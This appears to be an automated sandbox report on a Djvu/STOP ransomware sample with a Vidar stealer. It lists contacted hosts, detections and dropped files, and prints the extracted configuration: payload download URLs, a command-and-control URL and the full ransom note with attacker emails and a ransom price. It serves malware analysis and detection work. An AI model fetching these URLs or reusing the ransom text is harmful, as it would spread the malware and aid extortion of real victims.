sdfjhuz.com	186.13.17.220	true
cajgtus.com	186.145.236.18	true
steamcommunity.com	23.66.133.162	true
api.2ip.ua	172.67.139.220	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cajgtus.com/test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E	true	Avira URL Cloud: safe	unknown
http://cajgtus.com/test1/get.php	true	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199673019888	false		high
https://api.2ip.ua/geo.json	false		high
http://cajgtus.com/test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E&first=true	true	Avira URL Cloud: safe	unknown
https://95.217.9.149/sqln.dll	false	Avira URL Cloud: safe	unknown
http://sdfjhuz.com/dl/build2.exe	true	Avira URL Cloud: malware	unknown
http://cajgtus.com/files/1/build3.exe	true	Avira URL Cloud: malware	unknown
https://95.217.9.149/	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: R5391762lf.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://cajgtus.com/files/1/build3.exe	Avira URL Cloud: Label: malware
Source: http://sdfjhuz.com/dl/build2.exe	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Avira: detection malicious, Label: HEUR/AGEN.1313019
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm

Found malware configuration

Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_README.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0863PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
Source: 00000009.00000002.1502638549.0000000001BA0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: R5391762lf.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0040E870
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	2_2_0040EA51
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	2_2_0040EAA0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	2_2_0040EC68
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	2_2_00410FC0
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,	2_2_00411178

Source: R5391762lf.exe, 00000007.00000003.2078287754.00000000030F1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_2e10f168-1

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\R5391762lf.exe	Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Unpacked PE file: 11.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack

Uses 32bit PE files

Source: R5391762lf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\Users\user\_README.txt

Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.66.133.162:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.9.149:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.8:49725 version: TLS 1.2

Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\41\\5bU)% source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ m[%K source: R5391762lf.exe, 00000007.00000003.2081897313.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098573555.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100791102.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080641815.0000000003787000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Hq source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\kL source: R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-IQ\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ABA671~1A8E3aba6710fde0876af_0ata\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\NV, source: R5391762lf.exe, 00000007.00000003.2068868095.0000000003538000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.000000000351F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049588960.0000000003505000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049773121.0000000003517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\8\) source: R5391762lf.exe, 00000007.00000003.2068625676.0000000003494000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067819538.0000000003491000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2136303536.0000000003B65000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+D> source: R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2101597700.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ache\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068555631.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\W source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: R5391762lf.exe, 00000007.00000003.1948567038.0000000003699000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049541715.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\d.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ngs\ source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\5 source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
